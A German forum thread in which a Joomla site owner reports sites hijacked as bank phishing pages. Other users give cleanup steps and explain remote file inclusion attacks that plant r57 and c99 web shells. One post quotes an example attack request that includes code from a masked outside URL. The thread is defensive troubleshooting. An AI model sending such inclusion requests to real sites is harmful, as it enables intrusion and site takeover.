Thema: aktuelle Sicherheitslücken - Bank-Pishing Seite

Habe heute vormittag eine Mail von meinem Webhoster bekommen. Zwei meiner Joomlaseiten wurden als Pishing Seite umfunktioniert, mittels eingeschleuster Dateien (massenweise DLLs, install.exe und hastdunichtgesehen).

Mir ist eben aufgefallen, das die letzten Tage offenbar sehr viele Seite gehackt wurden.
Seit meinem letzten Hack mit Spamschleudern (etwa 1.5.13) habe ich alle Fremdkomponenten auf das absolut minimum reduziert. 1 wöchentlich gehe ich alle Seiten durch und prüfe mögliche Updates.

Hat jemand in den letzten Tagen vielleicht das gleiche Dejavu gehabt und auch seine Joomla Seite plötzlich als Pishing Seite der Citibank (cargoBank) wiedergefunden?

Ich sichere gerade Logfiles, Datenbank und Dateien, vielleicht lässt sich so das Problem leichter finden. Sollte jemand auf die Ursache stossen, bitte hier posten.

Hi,

Erfahrungen im Sinne gehackter Websites habe ich keine. ***aufholzkopfklopf***

Flottes Liste für gehackte Websites dürfte Dir ja bekannt sein, aber hier zur Sicherheit nochmal:

1) Sofort den gesamten Auftritt mit allen Dateien entfernen (sichern!)
2) Datenbankinhalt entfernen
3) Letzte definitv saubere Sicherung einspielen
4) Alle Passwörter ändern (Datenbank, Joomla, FTP, etc.)
5) Log-Dateien holen und Einbruchslücke lokalisieren
6) Lücke schließen!

hth

albatros

Hallo djmugge,
welche Komponenten hast du installiert?

und was sagt die PHPinfo im Backend zu folgenden Einstellungen:
allow_url_fopen
register_globals
magic_quotes_gpc

Hast du Zugriff zu den accesslogs und ftplogs?
Hast du dir das ftplog ggf. schon angesehen?

Zitat von Skodi

Hallo djmugge,
welche Komponenten hast du installiert?

und was sagt die PHPinfo im Backend zu folgenden Einstellungen:
allow_url_fopen
register_globals
magic_quotes_gpc

Hast du Zugriff zu den accesslogs und ftplogs?
Hast du dir das ftplog ggf. schon angesehen?

Ich bin noch mit dem Sichern / Entfernen beschäftigt. Auf dem Webspace liegen insgesamt 14 Domains / Subdomains mit ca. 1 GB Dateien (110.000 einzelne)

Die Datenbank ist bereits gesichert. Auch wenn nicht alle Seiten betroffen sind, werde ich alle erstmal mittels .htaccess vom Netz nehmen und mir dann die Logfiles usw. vorknöpfen.

Wenn ich mir die Postings der letzten Tage hier unter "Sicherheit" so ansehe, sind derzeit wieder sehr viele Joomla Seiten im "Schussfeld"...

Wenn ich mir die Postings der letzten Tage hier unter "Sicherheit" so ansehe, sind derzeit wieder sehr viele Joomla Seiten im "Schussfeld"...

Naja... im Schussfeld ist man ständig. Aber das wirste auch an deinen Logs sehen.
Da wird relativ häufig versucht per Remote File Inclusion eine r57 oder c99 shell einzuschleusen. Das sind oft einfach computergesteuerte Blindversuche die auf Komponenten "losgehen" welche u.U. gar nicht installiert sind... ein Massenprinzip halt.

Weshalb ich wegen der FTP-Logs gefragt hatte... ich habe kürzlich auf einer zwielichtigen russischen Seite ein Tool (Stealer / Trojaner, nenn es wie du willst) gesehen, welches auf Knopfdruck die Passwortdaten, CD-Keys usw. verschiedenster Programme eines damit infizierten Rechners ausliest. Neben Klassikern wie Outlook Express, Office, Windows usw. war in dieser Liste auch Filezilla ... von daher solltest du beim "Sicherheitsleck suchen" auch deinen Rechner mal unter die Lupe nehmen.

Wünsche dir auf jeden Fall die nötige Ausdauer und Geduld das Leck zu finden.

Naja... im Schussfeld ist man ständig. Aber das wirste auch an deinen Logs sehen.
Da wird relativ häufig versucht per Remote File Inclusion eine r57 oder c99 shell einzuschleusen.

Wie erkenne ich solche Versuche in der Log Datei?

Ich habe eben Google danach gefragt, bei den Ergebnisse werden viele, vermutlich obskure, Seiten in der Trefferliste gezeigt.

Eine Seite habe ich mir im Webcache angesehen, es war ein wohl renommiertes Autohaus. Die Seite war offensichtlich mit Joomla erstellt und sah sehr konservativ aus. Als Suchbegriffe in Google tauchten aber Worte wie,

Code:

***** Video, por.. , r57.txt, r57shell, r57 shell, r57, c99.txt, c99shell, c99 shell, c99.txt ...

auf. Was hat das zu bedeuten? Ist die Seite gehackt?

Hallo,

Zitat von waka

Code:

***** Video, por.. , r57.txt, r57shell, r57 shell, r57, c99.txt, c99shell, c99 shell, c99.txt ...

auf. Was hat das zu bedeuten? Ist die Seite gehackt?

Lesestoff gibt's auf security-project.org
als Suchbegriff: "Remote Shell Include: r57shell 1.3" eingeben

Danke, ich werde mich dort vertiefen.

Gruß

Matthias

Angriffe können z.B. so aussehen:

GET /news.php?id=http://www.linkunkenntlichgemacht.com/readme.txt??

das ist ein "allgemeiner" Angriff... eine news.php existiert auf der in diesem Fall angegriffenen Seite gar nicht.
Die readme.txt ist in diesem Fall der eingeschleuste Schadcode.

Es gibt aber natürlich joomla-spezfische Angriffe, die auf Schwachstellen in Komponenten abzielen.

Je nach Größe / Bekanntheit hat man das wöchentlich/täglich/stündlich ....

Hier ist das ganze auch nochmal schön erklärt:
http://www.joomla-blog.net/lexikon/r...inclusion.html
http://blog.botnetzprovider.de/webse...c99-php-shell/
http://www.web-tuts.de/advanced-loca...inclusion.html

Danke Skodi,

das sind sehr interessante Links. Ich merke, ich habe mich bisher immer noch zu wenig mit der Sicherheit in Joomla beschäftigt.

Eventuell hätte ich die Seite mit Joomla noch gar nicht starten sollen und besser gewartet bis ich mich mehr auskenne.

Naja, auf jeden Fall habe ich noch viel zu lernen, das ist mir sehr bewusst geworden.